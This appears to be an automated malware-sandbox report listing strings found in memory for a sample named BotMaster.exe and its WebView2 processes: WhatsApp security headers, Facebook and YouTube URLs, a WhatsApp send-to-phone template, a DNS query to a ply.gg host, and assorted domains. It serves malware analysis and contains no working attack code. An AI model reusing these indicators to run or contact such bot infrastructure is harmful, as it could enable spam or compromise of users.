                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugV6D/6J3BjwTnpCdhr8MLGazlYKchR4JPWNXmLo94m/CDNOBdgtefUNfbiLGHBBaMZXJTTXjjmUDvBW5IJjbTxQ==content-length54344dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=222, rtx=0, c=14, mss=1232, tbw=19966, tp=24, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=0Accept-Encoding, Referer equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugV6D/6J3BjwTnpCdhr8MLGazlYKchR4JPWNXmLo94m/CDNOBdgtefUNfbiLGHBBaMZXJTTXjjmUDvBW5IJjbTxQ==content-length54344dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=222, rtx=0, c=14, mss=1232, tbw=19966, tp=24, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=0Accept-Encoding, RefererAccept-Encoding equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-securitymax-age=31536000; preload; includeSubDomainsx-fb-debugV6D/6J3BjwTnpCdhr8MLGazlYKchR4JPWNXmLo94m/CDNOBdgtefUNfbiLGHBBaMZXJTTXjjmUDvBW5IJjbTxQ==content-length54344dateSun, 10 Mar 2024 16:46:08 GMTx-fb-connection-qualityMODERATE; q=0.3, rtt=222, rtx=0, c=14, mss=1232, tbw=19966, tp=24, tpl=0, uplat=3, ullat=-1alt-svch3=":443"; ma=86400priorityu=0Accept-Encoding, RefererAccept-Encoding equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2912815541.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ttps:\/\/www.facebook.c equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ttps:\/\/www.facebook.cm\/brow:86400,"ointhttp equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ttps:\/\/www.facebook.cm\/brow:86400,"ointhttp equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3661254657.00001B4400458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ttps:\/\/www.facebook.cm\/brow:86400,"ointhttp@sBD equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false]ta: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2986608844.00002DDC017BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com$=D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coep/?minimize=0D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coop/?minimize=0H equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.comA=D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3658376727.00001B440037C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com0:=D equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.comP$=D equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.comPG=D equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com` equals www.youtube.com (Youtube)
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: yyyy.MM.ddIhttps://www.facebook.com/mediaplusmeOhttps://web.whatsapp.com/send?phone={0} equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: }k.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 06:53:57 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-al
                  Source: msedgewebview2.exe, 00000020.00000003.2916083566.00001B4400478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: }k.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 06:53:57 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-al
                  Source: unknownDNS traffic detected: queries for: title-formula.at.ply.gg
                  Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129fy.ie.chalai.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360kjedge.dh.softby.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360kjedge.xrccp.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://430360cs.yc.anhuang.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://511sllqdkj.yc.anhuang.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://511zdqdkj.yc.anhuang.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://608hyestn.yc.ceg29.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://625mressw.yc.ceg29.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://803hyescs.30bz.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aldkj207.dh.softby.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aldkj827.xrccp.com
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3698431813.00002DDC0077C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323167129.000030DC00158000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136edS
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                  Source: msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970w
